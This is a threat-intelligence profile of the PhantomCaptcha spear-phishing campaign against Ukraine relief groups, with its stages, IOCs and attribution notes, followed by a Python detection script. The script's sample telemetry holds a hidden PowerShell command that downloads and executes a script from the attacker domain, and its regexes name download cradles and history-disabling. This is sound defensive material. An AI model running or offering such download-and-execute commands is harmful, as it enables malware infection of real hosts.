PhantomCaptcha
PhantomCaptcha is the name given by SentinelOne to a coordinated spear-phishing campaign active on October 8, 2025, targeting organizations involved in Ukraine war relief efforts, including the Red Cross, UNICEF, NRC, and local administrations. The attackers impersonated the Ukrainian President’s Office and used weaponized PDF lures that redirected victims to a fake Zoom site, zoomconference[.]app, followed by a ClickFix-style fake Cloudflare CAPTCHA designed to trick users into executing a malicious PowerShell command.

The intrusion chain used a three-stage PowerShell payload:

- Stage 1 was an obfuscated downloader script named cptch.
- Stage 2 fingerprinted the host (host name, domain, user, UUID, and PID), sent that data XOR-encrypted to command-and-control infrastructure, disabled PowerShell history, and retrieved an encrypted third stage.
- Stage 3 executed an in-memory WebSocket-based RAT that accepted Base64/JSON commands, including synchronous cmd and asynchronous psh execution, returned command output and system identifiers, and maintained persistent reconnect logic.

SentinelOne assessed that the final payload enabled arbitrary remote command execution, data exfiltration, and potential deployment of additional malware. The campaign demonstrated moderate OPSEC and was active for approximately 24 hours; the user-facing lure infrastructure was taken down quickly while the backend C2 remained active, suggesting the two were compartmentalized.

Infrastructure associated with the operation:

- zoomconference[.]app on 193.233.23[.]81, described as hosted on a Russian KVMKA VPS
- goodhillsenterprise[.]com on 45.15.156[.]24 (linked infrastructure)
- bsnowcommunications[.]com on 185.142.33[.]131 (linked infrastructure)
- zoomconference[.]click, registered by the attackers the day after the operation
- princess-mens[.]click, hosting fake Android apps that SentinelOne linked to the campaign, designed to steal contacts, media, and location data
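The chain described above gives a defender two kinds of signal: the network indicators listed on this page, and the behaviours of the PowerShell stages (a hidden download cradle pasted via the ClickFix lure, host fingerprinting, PowerShell history being disabled, a WebSocket client for C2). The Python below is an added hunting example, not code from SentinelOne or from the campaign: it scores constructed Sysmon-style process-creation records and PowerShell script-block records against both signal types. The IOC sets are taken from this page; the behavioural regexes, the explorer.exe parent check (ClickFix lures have the victim paste the command into the Run dialog) and the sample records are assumptions, because the report summarised here does not give the campaign's exact command-line syntax.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Network IOCs from the SentinelOne reporting summarised on this page (defanging removed).
IOC_DOMAINS = {
    "zoomconference.app",
    "zoomconference.click",
    "goodhillsenterprise.com",
    "bsnowcommunications.com",
    "princess-mens.click",
}
IOC_IPS = {"193.233.23.81", "45.15.156.24", "185.142.33.131"}

# Behavioural signals for the stages described in the report. The report names the
# behaviours, not the exact syntax the campaign used, so these regexes are assumptions.
BEHAVIOUR_SIGNALS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "download_cradle": re.compile(
        r"\b(?:iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString|DownloadData)\b", re.I),
    "history_disabled": re.compile(
        r"Set-PSReadLineOption\s+-HistorySaveStyle\s+SaveNothing", re.I),
    "websocket_client": re.compile(r"System\.Net\.WebSockets\.ClientWebSocket", re.I),
    "host_fingerprint": re.compile(
        r"\$env:COMPUTERNAME|\$env:USERDOMAIN|Win32_ComputerSystemProduct|\$PID\b", re.I),
}
# Anything that looks like a hostname or dotted IP; matches are filtered against the IOC sets.
HOST_RE = re.compile(r"\b[a-z0-9-]+(?:\.[a-z0-9-]+)+\b", re.I)
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}


@dataclass
class Finding:
    record_id: int
    severity: str
    iocs: list
    signals: list


def refang(text: str) -> str:
    """Turn defanged indicators such as zoomconference[.]app back into matchable form."""
    return text.replace("[.]", ".").replace("hxxp", "http")


def extract_iocs(text: str) -> list:
    """Return the known PhantomCaptcha domains and IPs referenced in a command line or script."""
    hosts = {h.lower() for h in HOST_RE.findall(refang(text))}
    return sorted(hosts & (IOC_DOMAINS | IOC_IPS))


def analyse_event(event: dict) -> Optional[Finding]:
    """Score one telemetry record; returns None when nothing suspicious is present.

    Records are either Sysmon-style process creations (image, parent_image, text = command
    line) or PowerShell script-block logs (text = script body). Stages 2 and 3 run in
    memory, so only the script-block log sees them.
    """
    if event["source"] == "process_create":
        image = event["image"].rsplit("\\", 1)[-1].lower()
        if image not in POWERSHELL_IMAGES:
            return None
    text = event["text"]
    signals = [name for name, rx in BEHAVIOUR_SIGNALS.items() if rx.search(text)]
    # ClickFix lures have the victim paste the command into the Run dialog, so the
    # PowerShell process is a child of explorer.exe (assumed typical path, not from the report).
    parent = event.get("parent_image", "").rsplit("\\", 1)[-1].lower()
    if parent == "explorer.exe":
        signals.append("spawned_by_explorer")
    iocs = extract_iocs(text)
    if iocs or len(signals) >= 3:
        severity = "high"
    elif len(signals) == 2:
        severity = "medium"
    else:
        return None
    return Finding(event["record_id"], severity, iocs, signals)


def hunt(events: list) -> list:
    """Run every record through analyse_event and keep the findings."""
    return [f for f in map(analyse_event, events) if f is not None]


# Constructed sample telemetry (not from the report): the ClickFix paste, the in-memory
# stage-2/3 script block it pulls down, and two benign PowerShell launches.
SAMPLE_EVENTS = [
    {"record_id": 1, "source": "process_create",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "text": 'powershell -w hidden -ep bypass -c "iwr https://zoomconference.app/cptch | iex"'},
    {"record_id": 2, "source": "script_block",
     "text": ("Set-PSReadLineOption -HistorySaveStyle SaveNothing\n"
              "$ws = New-Object System.Net.WebSockets.ClientWebSocket\n"
              "$info = @{host=$env:COMPUTERNAME; pid=$PID}")},
    {"record_id": 3, "source": "process_create",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "text": r"powershell -File C:\scripts\nightly-backup.ps1"},
    {"record_id": 4, "source": "process_create",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "text": "powershell"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"record {f.record_id}: {f.severity} iocs={f.iocs} signals={f.signals}")
```

In a real deployment the records would come from Sysmon event ID 1 and PowerShell event ID 4104; the behavioural patterns are deliberately loose (a user opening PowerShell from the Start menu also has explorer.exe as parent), which is why the example scores combinations rather than alerting on any single regex, and why an IOC hit is treated as high on its own.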
Campaign setup was traced back to March 27, 2025, when goodhillsenterprise[.]com was registered to host obfuscated PowerShell malware. Attribution was not confirmed. SentinelOne noted that the use of ClickFix could suggest a possible link to the Russian APT group COLDRIVER, but no definitive attribution was established. No additional aliases or sub-groups are identified in the reporting.
Targeting
Who, where, and (when attributed) which flag flies behind the operation. Pulled from open-source reporting and Mallory's analyst review.
Who they target
Sectors the actor has been observed targeting.
- humanitarian
- government
Recent activity
2 sources tracked across advisories, community write-ups, and news.
A spear-phishing campaign targeting Ukrainian war relief organizations, using weaponized PDFs and fake CAPTCHA pages to deliver a multi-stage WebSocket RAT.
Coordinated spear-phishing activity targeting Ukraine war relief organizations using weaponized PDFs that lead to a fake Zoom site and a ‘ClickFix’-style fake Cloudflare CAPTCHA to trick victims into running a malicious multi-stage PowerShell chain that culminates in an in-memory WebSocket-based RAT for remote command execution and potential data exfiltration.